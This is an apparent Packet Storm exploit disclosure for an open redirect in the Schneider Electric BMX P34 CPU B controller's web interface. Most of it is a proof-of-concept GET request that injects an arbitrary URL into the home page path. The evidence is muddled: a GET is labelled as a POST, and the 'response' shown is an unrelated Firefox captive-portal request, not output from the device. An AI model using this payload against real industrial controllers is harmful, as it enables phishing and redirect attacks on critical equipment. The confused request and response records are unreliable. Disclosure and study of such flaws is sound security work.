Schneider Electric BMX P34 CPU B Open Redirect

2018-08-28T00:00:00
ID PACKETSTORM:149126
Type packetstorm
Reporter Ismail Tasdelen
Modified 2018-08-28T00:00:00

Description

                                        
                                            `# Exploit Title: Schneider Electric BMX P34 CPU B - Unvalidated Redirects and Forwards  
# Date: 2018-07-21   
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://www.schneider-electric.com/  
# Hardware Link : https://www.schneider-electric.com/en/product/BMXP342020/  
# Software : Schneider Electric BMXP342020  
# Product Version: BMX P34 CPU B  
# Vulernability Type : Unvalidated Redirects and Forwards  
# Vulenrability : Open Redirect  
# CVE : N/A  
  
# An Open Redirect security vulnerability has been discovered in the Schneider Electric BMX P34 CPU B hardware product.  
  
HTTP POST Request :  
  
GET /html/english/home/index.htm?http://TARGET HTTP/1.1  
Host: 192.168.0.10  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Connection: close  
Upgrade-Insecure-Requests: 1  
If-Modified-Since: TUE JAN 01 00:00:45 1980  
Cache-Control: max-age=0  
  
HTTP Response Request :  
  
GET /success.txt HTTP/1.1  
Host: detectportal.firefox.com  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Cache-Control: no-cache  
Pragma: no-cache  
Connection: close  
`